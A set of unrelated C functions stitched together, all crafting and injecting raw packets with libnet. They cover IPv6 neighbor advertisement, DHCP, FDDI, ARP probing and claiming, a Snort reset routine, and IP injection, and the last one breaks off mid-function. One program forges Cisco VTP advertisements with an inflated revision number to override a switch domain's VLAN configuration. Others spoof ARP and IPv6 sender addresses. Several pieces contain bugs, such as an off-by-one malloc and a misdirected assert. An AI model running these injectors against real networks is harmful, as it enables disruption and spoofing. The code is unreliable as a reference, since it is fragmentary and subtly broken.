int main(int argc, char *argv[]) { libnet_t *l; int r; char *device = "eth0"; struct libnet_ether_addr *mac_address; struct in6_addr src_ip; struct libnet_in6_addr dst_ip; char errbuf[LIBNET_ERRBUF_SIZE]; libnet_ptag_t icmp_ptag = 0; libnet_ptag_t ipv6_ptag = 0; char payload[24] = { 0 }; memset(&src_ip, 0x66, sizeof(src_ip)); l = libnet_init( LIBNET_RAW6, device, errbuf); assert(l); mac_address = libnet_get_hwaddr(l); assert(mac_address); dst_ip = libnet_name2addr6(l, "::1" /* BCAST_ADDR - defined where? */, LIBNET_DONT_RESOLVE); memcpy(payload,src_ip.s6_addr,16); payload[16] = 2; /* 2 for Target Link-layer Address */ payload[17] = 1; /* The length of the option */ memcpy(payload+18,mac_address->ether_addr_octet, 6); /* 0x2000: RSO */ icmp_ptag = libnet_build_icmpv4_echo( 136,0,0,0x2000,0, (uint8_t *)payload,sizeof(payload), l, LIBNET_PTAG_INITIALIZER); assert(icmp_ptag); ipv6_ptag = libnet_build_ipv6( 0, 0, LIBNET_ICMPV6_H + sizeof(payload), /* ICMPV6_H == ICMPV4_H, luckily */ IPPROTO_ICMP6, 255, *(struct libnet_in6_addr*)&src_ip, dst_ip, NULL, 0, l, 0); assert(icmp_ptag); print_pblocks(l); { uint8_t* pkt1 = NULL; uint32_t pkt1_sz = 0; r = libnet_pblock_coalesce(l, &pkt1, &pkt1_sz); assert(r >= 0); libnet_diag_dump_hex(pkt1, LIBNET_IPV6_H, 0, stdout); libnet_diag_dump_hex(pkt1+LIBNET_IPV6_H, pkt1_sz-LIBNET_IPV6_H, 0, stdout); free(pkt1); pkt1 = NULL; } r = libnet_write(l); assert(r >= 0); return (EXIT_SUCCESS); }
int main(int argc, char *argv[]) { char *intf; u_long src_ip, options_len, orig_len; int i; libnet_t *l; libnet_ptag_t t; libnet_ptag_t ip; libnet_ptag_t udp; libnet_ptag_t dhcp; struct libnet_ether_addr *ethaddr; struct libnet_stats ls; char errbuf[LIBNET_ERRBUF_SIZE]; u_char options_req[] = { LIBNET_DHCP_SUBNETMASK , LIBNET_DHCP_BROADCASTADDR , LIBNET_DHCP_TIMEOFFSET , LIBNET_DHCP_ROUTER , LIBNET_DHCP_DOMAINNAME , LIBNET_DHCP_DNS , LIBNET_DHCP_HOSTNAME }; u_char *options; u_char enet_dst[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; u_char *tmp; // have to specify interface if (argc != 2) usage(argv[0]); intf = argv[1]; l = libnet_init( LIBNET_LINK, // injection type intf, // network interface errbuf); // errbuf if (!l) { fprintf(stderr, "libnet_init: %s", errbuf); exit(EXIT_FAILURE); } else { src_ip = libnet_get_ipaddr4(l);; if ((ethaddr = libnet_get_hwaddr(l)) == NULL) { fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l)); exit(EXIT_FAILURE); } printf("ip addr : %s\n", libnet_addr2name4(src_ip, LIBNET_DONT_RESOLVE)); printf("eth addr : "); for (i = 0; i < 6; i++) { printf("%x", ethaddr->ether_addr_octet[i]); if (i != 5) { printf(":"); } } printf("\n"); // build options packet i = 0; options_len = 3; // update total payload size // we are a discover packet options = malloc(3); options[i++] = LIBNET_DHCP_MESSAGETYPE; // type options[i++] = 1; // len options[i++] = LIBNET_DHCP_MSGDISCOVER; // data orig_len = options_len; options_len += sizeof(options_req) + 2; // update total payload size // workaround for realloc on old machines // options = realloc(options, options_len); // resize options buffer tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; // we are going to request some parameters options[i++] = LIBNET_DHCP_PARAMREQUEST; // type options[i++] = sizeof(options_req); // len memcpy(options + i, options_req, sizeof(options_req)); // data i += sizeof(options_req); // if we have an ip already, let's request it. if (src_ip) { orig_len = options_len; options_len += 2 + sizeof(src_ip); // workaround for realloc on old machines // options = realloc(options, options_len); tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; options[i++] = LIBNET_DHCP_DISCOVERADDR; // type options[i++] = sizeof(src_ip); // len memcpy(options + i, (char *)&src_ip, sizeof(src_ip));// data i += sizeof(src_ip); } // end our options packet options[i] = LIBNET_DHCP_END; // make sure we are at least the minimum length, if not fill // this could go in libnet, but we will leave it in the app for now if (options_len + LIBNET_DHCPV4_H < LIBNET_BOOTP_MIN_LEN) { orig_len = options_len; options_len = LIBNET_BOOTP_MIN_LEN - LIBNET_DHCPV4_H; // workaround for realloc on old machines // options = realloc(options, options_len); tmp = malloc(options_len); memcpy(tmp, options, orig_len); free(options); options = tmp; memset(options + i, 0, options_len - i); } // the goodies are here dhcp = libnet_build_dhcpv4( LIBNET_DHCP_REQUEST, // opcode 1, // hardware type 6, // hardware address length 0, // hop count 0xdeadbeef, // transaction id 0, // seconds since bootstrap 0x8000, // flags 0, // client ip 0, // your ip 0, // server ip 0, // gateway ip ethaddr->ether_addr_octet, // client hardware addr NULL, // server host name NULL, // boot file options, // dhcp options stuck in payload since it is dynamic options_len, // length of options l, // libnet handle 0); // libnet id // wrap it udp = libnet_build_udp( 68, // source port 67, // destination port LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // packet size 0, // checksum NULL, // payload 0, // payload size l, // libnet handle 0); // libnet id // hook me up with some ipv4 ip = libnet_build_ipv4( LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_DHCPV4_H + options_len, // length 0x10, // TOS 0, // IP ID 0, // IP Frag 16, // TTL IPPROTO_UDP, // protocol 0, // checksum src_ip, // src ip inet_addr("255.255.255.255"), // destination ip NULL, // payload 0, // payload size l, // libnet handle 0); // libnet id // we can just autobuild since we arent doing anything tricky t = libnet_autobuild_ethernet( enet_dst, // ethernet destination ETHERTYPE_IP, // protocol type l); // libnet handle // write to the wire if (libnet_write(l) == -1) { fprintf(stderr, " %s: libnet_write: %s\n", argv[0], strerror(errno)); exit(EXIT_FAILURE); } // fill and print stats libnet_stats(l, &ls); fprintf(stderr, "Packets sent: %ld\n" "Packet errors: %ld\n" "Bytes written: %ld\n", ls.packets_sent, ls.packet_errors, ls.bytes_written); libnet_destroy(l); // free mem free(options); exit(0); } exit(0); }
libnet_ptag_t libnet_autobuild_fddi(u_int8_t fc, u_int8_t *dst, u_int8_t dsap, u_int8_t ssap, u_int8_t cf, u_int8_t *org, u_int16_t type, libnet_t *l) { u_int32_t n, h; u_int16_t protocol_type; struct libnet_fddi_addr *src; libnet_pblock_t *p; libnet_ptag_t ptag; struct libnet_fddi_hdr fddi_hdr; if (l == NULL) { return (-1); } /* sanity check injection type if we're not in advanced mode */ if (l->injection_type != LIBNET_LINK && !(((l->injection_type) & LIBNET_ADV_MASK))) { snprintf(l->err_buf, LIBNET_ERRBUF_SIZE, "%s(): called with non-link layer wire injection primitive", __func__); p = NULL; goto bad; } n = LIBNET_FDDI_H; h = 0; ptag = LIBNET_PTAG_INITIALIZER; /* FDDI and Ethernet have the same address size - so just typecast */ src = (struct libnet_fddi_addr *) libnet_get_hwaddr(l); if (src == NULL) { /* err msg set in libnet_get_hwaddr() */ return (-1); } p = libnet_pblock_probe(l, ptag, n, LIBNET_PBLOCK_FDDI_H); if (p == NULL) { return (-1); } memset(&fddi_hdr, 0, sizeof(fddi_hdr)); fddi_hdr.fddi_frame_control = fc; /* Class/Format/Priority */ memcpy(fddi_hdr.fddi_dhost, dst, FDDI_ADDR_LEN); /* destination fddi address */ memcpy(fddi_hdr.fddi_shost, src, FDDI_ADDR_LEN); /* source fddi address */ fddi_hdr.fddi_llc_dsap = dsap; /* */ fddi_hdr.fddi_llc_ssap = ssap; /* */ fddi_hdr.fddi_llc_control_field = cf; /* Class/Format/Priority */ memcpy(&fddi_hdr.fddi_llc_org_code, org, LIBNET_ORG_CODE_SIZE); /* Deal with unaligned int16_t for type */ protocol_type = htons(type); memcpy(&fddi_hdr.fddi_type, &protocol_type, sizeof(int16_t)); /* Protocol Type */ n = libnet_pblock_append(l, p, (u_int8_t *)&fddi_hdr, LIBNET_FDDI_H); if (n == -1) { goto bad; } return (libnet_pblock_update(l, p, h, LIBNET_PBLOCK_FDDI_H)); bad: libnet_pblock_delete(l, p); return (-1); }
int main( int argc, char *argv[] ) { int opt,k=0; extern char *optarg; libnet_ptag_t t; libnet_t *lhandler; u_int32_t vtp_len=0, sent; struct vtp_summary *vtp_summ; struct vtp_subset *vtp_sub; u_int8_t *vtp_packet,*vtp_packet2, *aux; u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc }; u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 }; struct libnet_ether_addr *mymac; char *device; char error_information[LIBNET_ERRBUF_SIZE]; char *domain; // get options while ((opt = getopt(argc, argv, "i:d:")) != -1) { switch (opt) { case 'i': device=malloc(strlen(optarg)); strcpy(device,optarg); k=1; break; case 'd': domain=malloc(strlen(optarg)); strcpy(domain,optarg); break; default: usage(argv[0]); } } if(!k) { printf(" %s -i <interface> -d <vtp domain>\n must assign the interface\n",argv[0]);exit(1);} //init libnet lhandler=libnet_init(LIBNET_LINK,device,error_information); if (!lhandler) { fprintf(stderr, "libnet_init: %s\n", error_information); return -1; } mymac=libnet_get_hwaddr(lhandler); //build the first packet for vtp_summary vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary); vtp_packet = calloc(1,vtp_len); aux = vtp_packet; memcpy(vtp_packet,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); vtp_summ = (struct vtp_summary *)aux; vtp_summ->version = 0x01; vtp_summ->code = 0x01;//vtp_summary vtp_summ->followers = 0x01; vtp_summ->dom_len = strlen(domain); memcpy(vtp_summ->domain,domain,strlen(domain)); vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ vtp_packet, /* payload */ vtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ t = libnet_build_802_3( dst_mac, /* ethernet destination */ mymac->ether_addr_octet, /* ethernet source */ LIBNET_802_2_H + vtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ sent = libnet_write(lhandler); if (sent == -1) { libnet_clear_packet(lhandler); free(vtp_packet); return -1; } libnet_clear_packet(lhandler); //build the second vtp packet for vtp_subset vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset); vtp_packet2 = calloc(1,vtp_len); aux = vtp_packet2; memcpy(vtp_packet2,cisco_data,sizeof(cisco_data)); aux+=sizeof(cisco_data); vtp_sub = (struct vtp_subset *)aux; vtp_sub->version = 0x01; vtp_sub->code = 0x02; //vtp_subset vtp_sub->seq = 0x01; vtp_sub->dom_len = strlen(domain); memcpy(vtp_sub->domain,domain,strlen(domain)); vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok // memcpy(vtp_sub->aaa,aaa,strlen(aaa)); t = libnet_build_802_2( 0xaa, /* DSAP */ 0xaa, /* SSAP */ 0x03, /* control */ vtp_packet2, /* payload */ vtp_len, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ t = libnet_build_802_3( dst_mac, /* ethernet destination */ mymac->ether_addr_octet, /* ethernet source */ LIBNET_802_2_H + vtp_len, /* frame size */ NULL, /* payload */ 0, /* payload size */ lhandler, /* libnet handle */ 0); /* libnet id */ sent = libnet_write(lhandler); if (sent == -1) { libnet_clear_packet(lhandler); free(vtp_packet); return -1; } libnet_clear_packet(lhandler); }
int main(int argc, char ** argv) { char errbuf[LIBNET_ERRBUF_SIZE]; char errors[PCAP_ERRBUF_SIZE], pfilter[2048]; struct ifreq ifr; bpf_u_int32 mask=0, net=0; int st=-1, tries=0; struct bpf_program filter; struct myetheraddr *e=NULL; pcap_t *pdev=NULL; memset(&ifr, 0, sizeof(ifr)); if (argc != 3) { printf("FantaIP by KIKI\nUsage: (example) %s eth0 192.168.13.211\n", argv[0]); exit(1); } bob.device=strdup(argv[1]); assert(bob.device != NULL); bob.saddr=(uint32_t)inet_addr(argv[2]); bob.addr_cleared=0; st=socket(AF_INET, SOCK_DGRAM, 0); if (st < 0) { fprintf(stderr, "create socket fails: %s", strerror(errno)); exit(1); } bob.l=libnet_init(LIBNET_LINK_ADV, bob.device, errbuf); if (bob.l == NULL) { fprintf(stderr, "libnet_init: %s\n", strerror(errno)); exit(1); } bob.arp=0; bob.eth=0; e=(struct myetheraddr *)libnet_get_hwaddr(bob.l); if (e == NULL) { perror("bad things batman"); exit(1); } memcpy(&bob.shwaddr, e, sizeof(bob.shwaddr)); snprintf(pfilter, sizeof(pfilter) -1, FILTER); memset(errors, 0, sizeof(errors)); pcap_lookupnet(bob.device, &net, &mask, errors); memset(errors, 0, sizeof(errors)); pdev=pcap_open_live(bob.device, 500, 1, 0, errors); if (util_getheadersize(pdev, errors) != 14) { fprintf(stderr, "You SURE this is an ethernet interface? doesnt look like one\n"); exit(1); } if (util_preparepcap(pdev, errors) < 0) { fprintf(stderr, "Can't prepare bpf socket: %s\n", strerror(errno)); exit(1); } pcap_compile(pdev, &filter, pfilter, 0, net); pcap_setfilter(pdev, &filter); /* look for dups */ if (pcap_setnonblock(pdev, 1, errors) < 0) { fprintf(stderr, "Can't set pcap dev nonblocking: %s\n", errors); exit(1); } bob.addr_cleared=0; while (bob.addr_cleared == 0 && tries < 3) { /* lets be sure about this ;] */ broadcast_arp(ARPOP_REQUEST, 0xFFFFFFFF); broadcast_arp(ARPOP_REQUEST, 0x00000000); broadcast_arp(ARPOP_REQUEST, bob.saddr); signal(SIGALRM, &alarm_hndlr); breakloop=0; alarm(1); while (1) { pcap_dispatch(pdev, -1, &process_packet, NULL); if (breakloop || bob.addr_cleared != 0) break; } alarm(0); signal(SIGALRM, SIG_DFL); tries++; } alarm(0); signal(SIGALRM, SIG_DFL); if (bob.addr_cleared == -1) { fprintf(stderr, "Error: Address already in use\n"); exit(1); } bob.addr_cleared=1; printf("arping for %s [", inet_ntoa(*((const struct in_addr *)&bob.saddr))); fflush(stdout); decode_mac(&bob.shwaddr.octet[0]); printf(" ]\n"); fflush(stdout); /* ok block now */ if (pcap_setnonblock(pdev, 0, errors) < 0) { fprintf(stderr, "Can't set pcap dev nonblocking: %s\n", errors); exit(1); } pcap_loop(pdev, 0, &process_packet, NULL); libnet_destroy(bob.l); exit(0); }
int libnet_do_arp(struct libnet_link_int *l, u_char *device, struct ether_addr *e, u_long ip) { int n, i; u_char *buf, errbuf[256], *packet, *ip_p; struct libnet_ethernet_hdr *p; struct libnet_arp_hdr *a; u_long local_ip; pcap_t *pd; struct pcap_pkthdr pc_hdr; /* * Initialize a packet. */ if (libnet_init_packet(LIBNET_ARP_H + LIBNET_ETH_H, &buf) == -1) { perror("libnet_init_packet memory:"); exit(EXIT_FAILURE); } /* * Get the ethernet address of the device. */ e = libnet_get_hwaddr(l, device, errbuf); if (e == NULL) { fprintf(stderr, "libnet_get_hwaddr: %s\n", errbuf); return (-1); } /* * Get the IP address of the device. */ local_ip = htonl(libnet_get_ipaddr(l, device, errbuf)); if (!local_ip) { fprintf(stderr, "libnet_get_ipaddr: %s\n", errbuf); return (-1); } /* * Open the pcap device. */ pd = pcap_open_live(device, LIBNET_ARP_H + LIBNET_ETH_H, 1, 500, errbuf); if (pd == NULL) { fprintf(stderr, "pcap_open_live: %s\n", errbuf); return (-1); } /* * Ethernet header */ libnet_build_ethernet( enet_dst, /* broadcast ethernet address */ e->ether_addr_octet, /* source ethernet address */ ETHERTYPE_ARP, /* this frame holds an ARP packet */ NULL, /* payload */ 0, /* payload size */ buf); /* packet header memory */ /* * ARP header */ libnet_build_arp( ARPHRD_ETHER, /* hardware address type */ ETHERTYPE_IP, /* protocol address type */ ETHER_ADDR_LEN, /* hardware address length */ 4, /* protocol address length */ ARPOP_REQUEST, /* packet type - ARP request */ e->ether_addr_octet, /* source (local) ethernet address */ (u_char *)&local_ip, /* source (local) IP address */ enet_dst, /* target's ethernet address (broadcast) */ (u_char *)&ip, /* target's IP address */ NULL, /* payload */ 0, /* payload size */ buf + LIBNET_ETH_H); /* packet header memory */ n = libnet_write_link_layer(l, device, buf, LIBNET_ARP_H + LIBNET_ETH_H); if (n == -1) { fprintf(stderr, "libnet_write_link_layer choked\n"); return (-1); } printf("Sent a %d byte ARP request looking for the MAC of %s.\n", n, libnet_host_lookup(ip, 0)); printf("Waiting for a response...\n"); for (;(packet = ((u_char *)pcap_next(pd, &pc_hdr)));) { p = (struct libnet_ethernet_hdr *)(packet); if (ntohs(p->ether_type) == ETHERTYPE_ARP) { a = (struct libnet_arp_hdr *)(packet + LIBNET_ETH_H); if (ntohs(a->ar_op) == ARPOP_REPLY) { ip_p = (u_char *)&ip; if (IP_UCHAR_COMP(a->ar_spa, ip_p)) { printf("Target hardware address: "); for (i = 0; i < 6; i++) { printf("%x", a->ar_sha[i]); if (i != 5) { printf(":"); } } printf("\n"); } } } } libnet_destroy_packet(&buf); return (n); }
static void RejectLayer2(ipq_packet_msg_t *m) { IPHdr *iph; TCPHdr *tcph; ICMPHdr *icmph; EtherHdr *eh; int proto; int size = 0; int payload_len = 0; /* pointer to the device to use: according to the libnet manpage * this should be u_char, but I get a compiler warning then. * Making it a char fixes that. VJ. */ char *device = NULL; /* to get the mac address of the interface when in layer2 mode */ struct ether_addr *link_addr; u_char enet_dst[6]; /* mac addr for creating the ethernet packet. */ u_char enet_src[6]; /* mac addr for creating the ethernet packet. */ struct libnet_link_int *network = NULL; /* pointer to link interface struct */ int i = 0; iph = (IPHdr *)(l_tcp + ETH_H); proto = tmpP->iph->ip_proto; iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr; iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr; /* set the interface. For Nat/Ip-mode the device we use to send a reset to the offender * is the device on which the packet entered. For bridge-mode indev and outdev are always * equal, so we use indev as well. There is one rare exception to this... if on the Snort_ * inline box a client is run that causes a reset, indev is not set but outdev. */ if(m->indev_name[0] != '\0') device = m->indev_name; else device = m->outdev_name; /* Let's initialize Libnet */ if((network = libnet_open_link_interface(device, errbuf)) == NULL) { libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface for device %s failed: %s\n", device, errbuf); return; } /* lets get the mac addr of the interface */ if(!(link_addr = libnet_get_hwaddr(network, device, errbuf))) { libnet_error(LIBNET_ERR_FATAL, "libnet_get_hwaddr failed: %s\n", errbuf); return; } /* copy the mac: the src is set the the interface mac * but only if the mac wasn't supplied in the configfile */ if(pv.enet_src[0] == 0 && pv.enet_src[1] == 0 && pv.enet_src[2] == 0 && pv.enet_src[3] == 0 && pv.enet_src[4] == 0 && pv.enet_src[5] == 0) { /* either user set mac as 00:00:00:00:00:00 or it is blank */ for(i = 0; i < 6; i++) enet_src[i] = link_addr->ether_addr_octet[i]; } else { for(i = 0; i < 6; i++) enet_src[i] = pv.enet_src[i]; } /* copy the mac: the old src now becomes dst */ for(i = 0; i < 6; i++) enet_dst[i] = m->hw_addr[i]; //printf("reset src mac: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0],enet_src[1],enet_src[2],enet_src[3],enet_src[4],enet_src[5]); //printf("reset dst mac: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0],enet_dst[1],enet_dst[2],enet_dst[3],enet_dst[4],enet_dst[5]); switch(proto) { case IPPROTO_TCP: if (!tmpP->frag_flag) { size = ETH_H + IP_H + TCP_H; eh = (EtherHdr *)l_tcp; iph = (IPHdr *)(l_tcp + ETH_H); tcph = (TCPHdr *)(l_tcp + ETH_H + IP_H); iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr; iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr; tcph->th_sport = tmpP->tcph->th_dport; tcph->th_dport = tmpP->tcph->th_sport; tcph->th_seq = tmpP->tcph->th_ack; tcph->th_ack = htonl(ntohl(tmpP->tcph->th_seq) + 1); //printf("Send TCP Rst in Bridge-mode.\n"); /* calculate the checksums */ if (libnet_do_checksum(l_tcp + ETH_H, IPPROTO_TCP, TCP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthTCPRST: libnet_do_checksum failed for TCP_H"); return; } if (libnet_do_checksum(l_tcp + ETH_H, IPPROTO_IP, IP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthTCPRST: libnet_do_checksum failed for IP_H"); return; } /* build the ethernet packet */ if (libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, l_tcp) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthTCPRST: libnet_build_ethernet"); return; } /* finally write it to the link */ if(libnet_write_link_layer(network, device, l_tcp, size) < size) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthTCPRST: libnet_write_link_layer"); return; } } /* end if !tmpP->frag_flag */ break; case IPPROTO_UDP: if (!tmpP->frag_flag) { eh = (EtherHdr *)l_icmp; iph = (IPHdr *)(l_icmp + ETH_H); icmph = (ICMPHdr *) (l_icmp + ETH_H + IP_H); iph->ip_src.s_addr = tmpP->iph->ip_dst.s_addr; iph->ip_dst.s_addr = tmpP->iph->ip_src.s_addr; if ((payload_len = ntohs(tmpP->iph->ip_len) - (IP_HLEN(tmpP->iph) << 2)) > 8) { payload_len = 8; } memcpy((char *)icmph + ICMP_UNREACH_H, tmpP->iph, (IP_HLEN(tmpP->iph) << 2) + payload_len); size = ETH_H + IP_H + ICMP_UNREACH_H + (IP_HLEN(tmpP->iph) << 2) + payload_len; iph->ip_len = htons(size); /* calculate the checksums */ if (libnet_do_checksum(l_icmp + ETH_H, IPPROTO_ICMP, size - IP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthICMPRST: libnet_do_checksum failed for IPPROTO_ICMP"); return; } if (libnet_do_checksum(l_icmp + ETH_H, IPPROTO_IP, IP_H) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthICMPRST: libnet_do_checksum failed for IPPROTO_IP"); return; } /* build the ethernet packet */ if (libnet_build_ethernet(enet_dst, enet_src, ETHERTYPE_IP, NULL, 0, l_icmp) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthICMPRST: libnet_build_ethernet"); return; } /* finally write it to the link */ //printf("Send ICMP Rst in Bridge-mode.\n"); if(libnet_write_link_layer(network, device, l_icmp, size) < size) { libnet_error(LIBNET_ERR_CRITICAL, "SendEthICMPRST: libnet_write_link_layer"); return; } } break; } /* end switch(proto) */ /* clean up file-descriptors for the next time we call RejectLayer2 */ if((libnet_close_link_interface(network)) == -1) { libnet_error(LIBNET_ERR_CRITICAL, "libnet_close_link_interface error\n"); } }
int main(int argc, char *argv[]) { int r; int i; int c; char ebuf[LIBNET_ERRBUF_SIZE]; struct ether_addr broadcast_ea; struct ether_addr *sea; struct ether_addr tea; struct in_addr sip, tip; uint8_t *arp_probe_packet; int sock_fd; struct ifreq ifr; char *if_name = "eth0"; struct libnet_link_int *lin; uint32_t tmp[6]; broadcast_ea.ether_addr_octet[0] = 0xFF; broadcast_ea.ether_addr_octet[1] = 0xFF; broadcast_ea.ether_addr_octet[2] = 0xFF; broadcast_ea.ether_addr_octet[3] = 0xFF; broadcast_ea.ether_addr_octet[4] = 0xFF; broadcast_ea.ether_addr_octet[5] = 0xFF; while ((c = getopt(argc, argv, "hi:")) != EOF) { switch (c) { case 'h': usage(0); case 'i': if_name = optarg; break; default: print("unknown argument: %s\n", optarg); usage(1); } } // initialize libnet link-level access to the network interface lin = libnet_open_link_interface(if_name, ebuf); if (!lin) die("libnet_open_link_interface(\"%s\"): %s\n", if_name, ebuf); // get the Ethernet address of this interface sea = libnet_get_hwaddr(lin, if_name, ebuf); if (!sea) die("libnet_get_hwaddr(\"%s\"): %s\n", if_name, ebuf); // get the IP address of this interface sock_fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP); if (sock_fd < 0) die("cannot create socket: %s\n", strerror(errno)); strncpy(ifr.ifr_name, if_name, IFNAMSIZ - 1); ifr.ifr_name[IFNAMSIZ - 1] = (char)NULL; ifr.ifr_addr.sa_family = AF_INET; r = ioctl(sock_fd, SIOCGIFADDR, &ifr); if (r < 0) die("SIOCSIFADDR error: %s\n", strerror(errno)); sip = ((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr; close(sock_fd); for (i = optind; i < argc; i ++) { if (strncmp(argv[i], "sip=", 4) == 0) { r = inet_aton(&argv[i][4], &sip); if (r == 0) die("invalid sip\n"); } else if (strncmp(argv[i], "sea=", 4) == 0) { r = sscanf( argv[i], "sea=%X:%X:%X:%X:%X:%X", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5] ); sea->ether_addr_octet[0] = tmp[0]; sea->ether_addr_octet[1] = tmp[1]; sea->ether_addr_octet[2] = tmp[2]; sea->ether_addr_octet[3] = tmp[3]; sea->ether_addr_octet[4] = tmp[4]; sea->ether_addr_octet[5] = tmp[5]; if (r != 6) die("invalid sea\n"); } else if (strncmp(argv[i], "tip=", 4) == 0) { r = inet_aton(&argv[i][4], &tip); if (r == 0) die("invalid tip\n"); } else if (strncmp(argv[i], "tea=", 4) == 0) { r = sscanf( argv[i], "tea=%X:%X:%X:%X:%X:%X", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5] ); tea.ether_addr_octet[0] = tmp[0]; tea.ether_addr_octet[1] = tmp[1]; tea.ether_addr_octet[2] = tmp[2]; tea.ether_addr_octet[3] = tmp[3]; tea.ether_addr_octet[4] = tmp[4]; tea.ether_addr_octet[5] = tmp[5]; if (r != 6) die("invalid tea\n"); } else { die("unknown arg: %s\n", argv[i]); } } print("interface %s\n", if_name); print(" sip: %s\n", inet_ntoa(sip)); print(" sea: %02X:%02X:%02X:%02X:%02X:%02X\n", sea->ether_addr_octet[0], sea->ether_addr_octet[1], sea->ether_addr_octet[2], sea->ether_addr_octet[3], sea->ether_addr_octet[4], sea->ether_addr_octet[5] ); print(" tip: %s\n", inet_ntoa(tip)); print(" tea: %02X:%02X:%02X:%02X:%02X:%02X\n", tea.ether_addr_octet[0], tea.ether_addr_octet[1], tea.ether_addr_octet[2], tea.ether_addr_octet[3], tea.ether_addr_octet[4], tea.ether_addr_octet[5] ); // allocate memory for the ARP probe packet r = libnet_init_packet(LIBNET_ETH_H + LIBNET_ARP_H, &arp_probe_packet); if (r == -1) die("libnet_init_packet(): error\n"); // build the Ethernet header of the ARP probe packet r = libnet_build_ethernet( broadcast_ea.ether_addr_octet, sea->ether_addr_octet, ETHERTYPE_ARP, NULL, 0, // payload pointer and size arp_probe_packet ); if (r == -1) die("libnet_build_ethernet(): error\n"); // build the ARP header r = libnet_build_arp( ARPHRD_ETHER, ETHERTYPE_IP, ETH_ALEN, 4, ARPOP_REQUEST, sea->ether_addr_octet, (uint8_t *)&sip.s_addr, tea.ether_addr_octet, (uint8_t *)&tip.s_addr, NULL, 0, // payload pointer and size arp_probe_packet + LIBNET_ETH_H ); if (r == -1) die("libnet_build_arp(): error\n"); r = libnet_write_link_layer( lin, if_name, arp_probe_packet, LIBNET_ARP_H + LIBNET_ETH_H ); if (r == -1) die("libnet_write_link_layer(): error\n"); return 0; }
/* * injection_write_ip * * Description: * - Write an IP packet into the wire. It can use either raw sockets * or the wire * * Inputs: * - ip_packet: the IP packet * * Outputs: * - return: 0 if ok, <0 if there were problems * */ int injection_write_ip (u_char *ip_packet) { #if defined(INJECT_USING_RAW_SOCKETS) || defined(INJECT_USING_LINK_LAYER) int i; u_int16_t packet_size = ntohs(*(u_int16_t*)(ip_packet+2)); #endif #if defined(INJECT_USING_RAW_SOCKETS) int network; /* network initialization */ if ((network = libnet_open_raw_sock(IPPROTO_RAW)) < 0) { return WIRE_ERR_PKTD_INJECTION_OPEN; /* packet injection */ } else if ((i = libnet_write_ip (network, ip_packet, packet_size)) < packet_size) { return WIRE_ERR_PKTD_INJECTION_WRITE_IP; /* shut down the interface */ } else if (libnet_close_raw_sock (network) < 0) { return WIRE_ERR_PKTD_INJECTION_CLOSE; } return WIRE_ERR_NONE; #elif defined(INJECT_USING_LINK_LAYER) char buffer[LIBNET_ETH_H+IP_MAXPACKET]; struct in_addr in; int size = 1024; struct libnet_link_int *network; /* pointer to link interface struct */ char *interface = NULL; /* pointer to the device to use */ struct sockaddr_in sin; char errbuf[1024]; struct ether_addr remote_eth, *tmp_eth; /* network initialization */ if (libnet_select_device(&sin, &interface, errbuf) == -1) { return WIRE_ERR_PKTD_NO_WRITE_DEVICE_ACCESS; } if ((network = libnet_open_link_interface(interface, errbuf)) == NULL) { return WIRE_ERR_PKTD_INJECTION_OPEN; } /* get local ethernet address */ if ((tmp_eth = libnet_get_hwaddr(network, interface, errbuf)) == NULL) { (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_OPEN; } memcpy (&local_eth, tmp_eth, 6); debug3 ("injection_write_ip: the local ethernet address is %s\n", ether_ntoa(&local_eth)); /* get remote ethernet address (the packet is already in network order) */ in.s_addr = *(u_int32_t*)(ip_packet+16); /* try to get the remote MAC address from the ARP cache */ if (get_mac_address (in, buffer, size) < 0) { /* MAC address of the IP address not in ARP cache */ /* get the gateway needed to reach the destination */ struct in_addr gw; if (get_gateway (in, &gw) < 0) { debug3 ("injection_write_ip: can't find MAC nor gateway for %s\n", inet_ntoa(in)); (void)libnet_close_link_interface(network); return WIRE_ERR_PKTD_INJECTION_WRITE_IP; } /* get the gateway's ethernet address */ if (get_mac_address (gw, buffer, size) < 0) { debug3 ("injection_write_ip: can't find MAC for %s's ", inet_ntoa(in)); debug3 ("gateway (%s)\n", inet_ntoa(gw)); /* XXX: This case means typically the destination host is in * the same network than the source, but the destination MAC * address is not in the local ARP cache. 